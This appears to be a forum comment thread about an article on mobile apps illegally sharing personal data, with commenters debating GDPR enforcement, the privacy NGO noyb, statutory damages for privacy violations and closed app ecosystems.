A couple of years ago I read "The Age of Surveillance Capitalism." Zuboff is thorough and relentless. Couple this sociopolitical manipulation machine with newfound AI and it gets even more frightening.
> Max [Schrems, a lawyer and privacy activist] had had the idea of a professional privacy enforcement NGO (similar to consumer rights organizations) that brings cases against large corporations on behalf of the users for a while and was ultimately able to realize it through noyb
On the one hand, I'm glad that organizations like noyb exist. On the other, it's a testament to the failure of enforcing privacy regulations, where we need to have organizations hunt down flagrant perpetrators. It would be akin to relying on vigilante groups to enforce common laws, instead of having federal law enforcement agencies.
I assure you that if we didn't have these closed ecosystems, we would have more secure software. Data exfiltration is a security issue, perhaps even the most significant one. All the theatre we do with software signing was better implemented in the average software repository that all Linux distributions come with.
Failing to see the larger picture, people wanted these enclaves. And no, even Apple wants to make its environment attractive, and that means appeasing advertisers.
Overall the behavior of legitimate software in a PC or Mac environment is just far better, it isn't even a competition.
All they had to do was legislate a statutory amount someone could claim per privacy violation, and the problem would have disappeared overnight, thanks to companies set up to litigate on behalf of consumers in exchange for a cut.
the fact that in the U.S. you can sue larger and more powerful organizations for having harmed you is a clear benefit compared to some European systems (the way this works varies between countries).
In Denmark, and I assume in Norway, if you have been harmed by a governmental organization, you have to complain and spend lots of time dealing with the problem, and in the end you get nothing for your time: a worthless apology and a change of the policy that harmed you in the first place, years wasted, and nothing done to right the hurt or damage you suffered.
Better the American way, as an opportunity, however limited, to make the powerful suffer in kind.
Would it be bad in this case? We have a chronic problem of lack of GDPR enforcement and it's clear regulators are underfunded/incompetent/overwhelmed/not interested in doing their job.
If the regulators can't, let someone else do the job.
Sounds like a good reason to roll out legislation that legally mandates all this data go through a centralised authority. Which would make for even easier collection, enshrined in law.
Unfortunately, all this stuff is going in one direction.
> How mobile apps illegally share your personal data
There are many different methods you can use to share a file, including but not limited to Dropbox and floppy drives. Your data is a file, or maybe it's an SQL table! Sharing a file can be done by anyone; be careful, though, as sharing an SQL table must be done by trained professionals. DO NOT ATTEMPT TO SHARE AN SQL TABLE WITHOUT PROPER SUPERVISION.
Seriously, what's the news/content here? Is mobile apps not complying with EU regulations noteworthy in any way?
It's not about the format of the data, but the content. Personal Information (PI) can only be shared with consent, and only for clearly specified purposes. That's the Bad Thing they're reporting on, albeit somewhat poorly.
And there are strong(er) privacy laws in California (USA), the EU, Switzerland, and the UK. That's just off the top of my head. So it's not just EU law being broken here.